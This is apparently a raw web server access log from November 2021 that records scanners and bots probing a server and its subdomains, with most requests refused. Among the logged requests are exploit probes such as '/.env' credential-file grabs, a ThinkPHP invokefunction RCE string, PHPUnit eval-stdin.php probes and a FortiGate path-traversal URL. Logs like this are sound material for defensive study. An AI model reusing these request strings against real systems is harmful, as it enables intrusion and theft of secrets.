+0000] 444 - GET https members.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https my.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https qa.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https system.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https pm.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https status.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https reports.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https sms.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https ss.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https staging-steppyweb.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https pay.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https taxi.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:36 +0000] 444 - GET https prod.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:36 +0000] 444 - GET https service.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:05:48:34 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 34.77.162.5] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [16/Nov/2021:06:12:17 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Nov/2021:07:02:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.24] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [16/Nov/2021:07:07:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [16/Nov/2021:07:14:10 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Nov/2021:07:48:04 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.203.39] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Nov/2021:08:13:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Nov/2021:09:09:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [16/Nov/2021:09:12:24 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Nov/2021:09:34:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.198.225] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Nov/2021:10:17:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.193] [Length 0] [Gzip -] "-" "-" [16/Nov/2021:10:17:06 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.193] [Length 252] [Gzip -] "-" "-" [16/Nov/2021:10:17:06 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.193] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [16/Nov/2021:10:17:24 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Nov/2021:10:24:16 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 134.209.90.83] [Length 0] [Gzip -] "-" "-" [16/Nov/2021:10:51:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [16/Nov/2021:10:52:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Nov/2021:11:12:25 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Nov/2021:12:24:13 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [16/Nov/2021:12:36:30 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.205.35] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Nov/2021:12:37:06 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.170] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Nov/2021:12:37:36 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.231] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Nov/2021:13:14:09 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24" "-" [16/Nov/2021:13:14:09 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" "-" [16/Nov/2021:13:14:09 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [16/Nov/2021:14:13:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 142.202.136.211] [Length 0] [Gzip -] "curl/7.58.0" "-" [16/Nov/2021:14:57:54 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [16/Nov/2021:15:02:32 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:15:02:32 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:16:26:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.80] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Nov/2021:16:53:08 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Nov/2021:18:04:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Nov/2021:18:04:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Nov/2021:18:04:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Nov/2021:18:04:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Nov/2021:18:04:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Nov/2021:18:04:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Nov/2021:18:57:56 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 137.184.167.45] [Length 0] [Gzip -] "-" "-" [16/Nov/2021:19:11:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.165] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [16/Nov/2021:19:55:32 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Nov/2021:21:04:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.79] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Nov/2021:22:03:06 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.162] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [16/Nov/2021:22:59:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.203.209] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Nov/2021:23:11:02 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.199.180] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Nov/2021:23:17:39 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.210.184] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Nov/2021:00:24:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.220.101.58] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [17/Nov/2021:00:24:51 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.31.175.247] [Length 0] [Gzip -] "-" "-" [17/Nov/2021:00:24:53 +0000] 400 - - https localhost "-" [Client 185.31.175.247] [Length 154] [Gzip -] "-" "-" [17/Nov/2021:00:24:54 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.100.249] [Length 0] [Gzip -] "-" "-" [17/Nov/2021:00:25:02 +0000] 400 - - https localhost "-" [Client 185.220.100.249] [Length 154] [Gzip -] "-" "-" [17/Nov/2021:00:54:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.161.246] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Nov/2021:00:55:15 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 3.235.228.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:01:02:23 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:02:08:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [17/Nov/2021:02:08:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [17/Nov/2021:02:10:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:03:15:27 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Nov/2021:03:15:28 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Nov/2021:03:41:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:03:49:22 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [17/Nov/2021:04:25:33 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.197.157] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Nov/2021:04:43:37 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [17/Nov/2021:04:56:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:05:51:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [17/Nov/2021:06:19:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [17/Nov/2021:06:19:13 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211117141633" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [17/Nov/2021:07:53:42 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.176] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Nov/2021:07:57:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.200.241] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [17/Nov/2021:08:05:30 +0000] 444 - GET https gitlab.moralanimal.net "/users/sign_in" [Client 104.200.146.41] [Length 0] [Gzip -] "-" "-" [17/Nov/2021:08:29:21 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [17/Nov/2021:08:30:49 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [17/Nov/2021:08:31:25 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [17/Nov/2021:09:06:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.168] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [17/Nov/2021:09:13:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [17/Nov/2021:09:36:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.199.183] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Nov/2021:09:45:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.68] [Length 0] [Gzip -] "-" "-" [17/Nov/2021:10:52:20 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 198.98.49.124] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [17/Nov/2021:11:30:00 +0000] 400 - - http localhost "-" [Client 194.165.16.111] [Length 154] [Gzip -] "-" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https test.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https dev.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https beta.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https laravel.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https panel.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https stage.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https new.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https staging.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https demo.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https local.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https game.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https development.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https sandbox.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https web.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https sqs.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https backend.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https stg.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https testing.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https cms.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https support.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https login.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:11:32:53 +0000] 444 - GET https apps.moralanimal.net "/.env" [Client 185.254.31.122] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Nov/2021:12:32:12 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Nov/2021:12:32:46 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.104.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Nov/2021:12:33:36 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.111.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Nov/2021:13:26:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.213.136] [Length 0] [Gzip -] "-" "-" [17/Nov/2021:14:01:28 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:14:03:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 146.70.20.247] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" "-" [17/Nov/2021:14:03:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 146.70.20.247] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" "-" [17/Nov/2021:14:19:09 +0000] 400 - GET https localhost "/" [Client 161.35.188.242] [Length 154] [Gzip -] "-" "-" [17/Nov/2021:14:19:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 161.35.188.242] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" 